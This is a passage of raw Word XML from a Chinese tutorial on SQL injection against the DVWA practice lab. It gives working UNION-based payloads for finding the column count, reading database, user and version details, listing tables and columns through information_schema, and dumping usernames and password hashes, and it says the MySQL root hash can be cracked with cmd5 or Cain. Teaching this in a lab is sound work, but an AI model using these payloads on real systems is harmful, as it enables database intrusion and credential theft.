    <w:p w14:paraId="3C946D5B"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Mysql&gt;select first_name,last_name from user where user_id=”order by 3+–+’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534075D"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可以看到因为不存在第三列会产生报错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B4351"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user id输入’order by 2+–+的时候，后端查询语句如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43224DAC"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Mysql&gt;select first_name,last_name from user where user_id=”order by 2+–+’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160A91C2" w14:textId="77777777" w:rsidR="008C5B57" w:rsidRPr="00CD76A0" w:rsidRDefault="008C5B5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可以看到没有产生任何错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8683E3" w14:textId="77777777" w:rsidR="008C5B57" w:rsidRDefault="0001544F" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="504FA14F" wp14:editId="19EC235A">
            <wp:extent cx="5274310" cy="3726339"/>
            <wp:effectExtent l="19050" t="0" r="2540"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274310" cy="3726339"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E6F15" w14:textId="77777777" w:rsidR="00CE3D51" w:rsidRDefault="00CE3D51" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE3D51">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1314EA65" wp14:editId="2470EF19">
            <wp:extent cx="5274310" cy="3364972"/>
            <wp:effectExtent l="19050" t="0" r="254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274310" cy="3364972"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02786DBF" w14:textId="77777777" w:rsidR="0001544F" w:rsidRDefault="0001544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接下来进一步使用union查询语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6116E844" w14:textId="77777777" w:rsidR="000650E8" w:rsidRPr="000650E8" w:rsidRDefault="000650E8" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D9552B" w14:textId="77777777" w:rsidR="0001544F" w:rsidRPr="009937DC" w:rsidRDefault="00E12696" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r w:rsidR="009937DC" w:rsidRPr="009937DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="0001544F" w:rsidRPr="009937DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用联合查询</w:t>
      </w:r>
      <w:r w:rsidR="00D929D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查询当前数据库、用户、版本信息等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA522A6" w14:textId="77777777" w:rsidR="00854818" w:rsidRPr="00200887" w:rsidRDefault="00F52E4A"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继续构造union select语句，来查询正在使用中的用户</w:t>
      </w:r>
      <w:r w:rsidR="000650E8" w:rsidRPr="000650E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>user()</w:t>
      </w:r>
      <w:r w:rsidR="000650E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidR="000650E8" w:rsidRPr="000650E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>database()</w:t>
      </w:r>
      <w:r w:rsidR="000650E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="000650E8" w:rsidRPr="000650E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据库版本</w:t>
      </w:r>
      <w:r w:rsidR="000650E8" w:rsidRPr="000650E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r w:rsidR="000650E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="000650E8" w:rsidRPr="000650E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务器操作系统</w:t>
      </w:r>
      <w:r w:rsidR="000650E8" w:rsidRPr="000650E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@@version_compile_os</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,用以下语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2EED7B" w14:textId="77777777" w:rsidR="00F52E4A" w:rsidRPr="00CD76A0" w:rsidRDefault="00F52E4A"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union select user(),database()+–</w:t>
      </w:r>
      <w:r w:rsidR="000F6153">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5963D9" w14:textId="77777777" w:rsidR="00F52E4A" w:rsidRPr="00F52E4A" w:rsidRDefault="00F52E4A" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B9153B9" wp14:editId="3145982E">
            <wp:extent cx="5274310" cy="3800496"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3800496"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B82DFB2" w14:textId="532FDF59" w:rsidR="000926E5" w:rsidRPr="0026029F" w:rsidRDefault="00992E2C" w:rsidP="00992E2C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00992E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">' union select user(),database()+--+ </w:t>
      </w:r>
      <w:r w:rsidR="00F52E4A" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查询数据库的版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CC8980" w14:textId="77777777" w:rsidR="00FD3D32" w:rsidRPr="00FD3D32" w:rsidRDefault="00E12696" w:rsidP="00FD3D32">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r w:rsidR="00FD3D32" w:rsidRPr="009937DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="0026029F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>获取表名、字段、值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC3EB8A" w14:textId="77777777" w:rsidR="00FD3D32" w:rsidRDefault="00FD3D32" w:rsidP="00FD3D32">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前面跟大家讲过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql 5.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3D32">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储所有数据库下的表名和列名信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，下面我们就来查询</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3D32">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库名下的表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的信息（条件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>table_schema=</w:t>
      </w:r>
      <w:r w:rsidR="00727167" w:rsidRPr="00727167">
        <w:t>0x64767761</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据名为</w:t>
      </w:r>
      <w:r w:rsidR="00727167">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2FC04F" w14:textId="77777777" w:rsidR="00FD3D32" w:rsidRDefault="00FD3D32" w:rsidP="00FD3D32">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema.tables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库名下表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">tables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录所有数据库名下的所有表名信息的表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F172DC" w14:textId="77777777" w:rsidR="00FD3D32" w:rsidRDefault="00FD3D32" w:rsidP="00FD3D32">
      <w:pPr>
        <w:ind w:firstLine="420"/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3D32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>1,group_concat(table_name) from information_schema.tables where table_schema=</w:t>
      </w:r>
      <w:r w:rsidR="00727167" w:rsidRPr="00727167">
        <w:t>0x64767761</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD04BCC" w14:textId="77777777" w:rsidR="00727167" w:rsidRDefault="00727167" w:rsidP="00FD3D32">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55EBEA7C" wp14:editId="568F85B7">
            <wp:extent cx="5279894" cy="2635200"/>
            <wp:effectExtent l="1905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78120" cy="2634315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF89DD6" w14:textId="77777777" w:rsidR="00FD3D32" w:rsidRDefault="00FD3D32" w:rsidP="00FD3D32">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECBF495" w14:textId="77777777" w:rsidR="00FD3D32" w:rsidRDefault="00FD3D32" w:rsidP="003D6925">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询表名</w:t>
      </w:r>
      <w:r w:rsidR="003D6925" w:rsidRPr="003D6925">
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的所有列名信息</w:t>
      </w:r>
      <w:r w:rsidR="00567C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(注:</w:t>
      </w:r>
      <w:r w:rsidR="00567C92" w:rsidRPr="00567C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> information_schema.columns</w:t>
      </w:r>
      <w:r w:rsidR="00567C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="00567C92" w:rsidRPr="00567C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录所有数据库名下的所有列名信息的表</w:t>
      </w:r>
      <w:r w:rsidR="00567C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3172C9CD" w14:textId="77777777" w:rsidR="00576FC8" w:rsidRDefault="001F0F9C" w:rsidP="00576FC8">
      <w:pPr>
        <w:ind w:firstLine="420"/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidR="00FD3D32">
        <w:t>UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=</w:t>
      </w:r>
      <w:r w:rsidR="003D6925" w:rsidRPr="003D6925">
        <w:t>0x7573657273</w:t>
      </w:r>
      <w:r w:rsidR="00576FC8" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB496DD" w14:textId="77777777" w:rsidR="00FD3D32" w:rsidRDefault="00576FC8" w:rsidP="00FD3D32">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B09A22F" wp14:editId="1B9FC3B6">
            <wp:extent cx="5273715" cy="3456000"/>
            <wp:effectExtent l="19050" t="0" r="3135" b="0"/>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278120" cy="3458887"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C6A82" w14:textId="77777777" w:rsidR="00576FC8" w:rsidRDefault="00576FC8" w:rsidP="00576FC8">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询列名</w:t>
      </w:r>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、password下的所有用户名和密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495EEF58" w14:textId="77777777" w:rsidR="00576FC8" w:rsidRDefault="007860B5" w:rsidP="007860B5">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007860B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://192.168.1.18:8080/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT user,password from users+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A10CF05" w14:textId="77777777" w:rsidR="007860B5" w:rsidRDefault="007860B5" w:rsidP="007860B5">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B23E067" wp14:editId="0A64AD9B">
            <wp:extent cx="5275320" cy="2102400"/>
            <wp:effectExtent l="19050" t="0" r="1530" b="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5278120" cy="2103516"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E2DAAB" w14:textId="77777777" w:rsidR="00983549" w:rsidRDefault="00E12696" w:rsidP="00983549">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>四</w:t>
      </w:r>
      <w:r w:rsidR="00983549" w:rsidRPr="009937DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="0030327B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="0085145E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ysql </w:t>
      </w:r>
      <w:r w:rsidR="0013100B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="0013100B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>用户密码</w:t>
      </w:r>
      <w:r w:rsidR="0085145E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>存储位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EBA286" w14:textId="77777777" w:rsidR="00983549" w:rsidRDefault="00143375" w:rsidP="00983549">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库最高权限用户是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表中，密码是采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特有的加密，通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站进行解密</w:t>
      </w:r>
      <w:r w:rsidR="0091174D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或通过</w:t>
      </w:r>
      <w:r w:rsidR="0091174D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cain</w:t>
      </w:r>
      <w:r w:rsidR="0091174D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等这类专业</w:t>
      </w:r>
      <w:r w:rsidR="00567CD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以对</w:t>
      </w:r>
      <w:r w:rsidR="0091174D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql hash</w:t>
      </w:r>
      <w:r w:rsidR="0091174D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破解</w:t>
      </w:r>
      <w:r w:rsidR="0091174D">
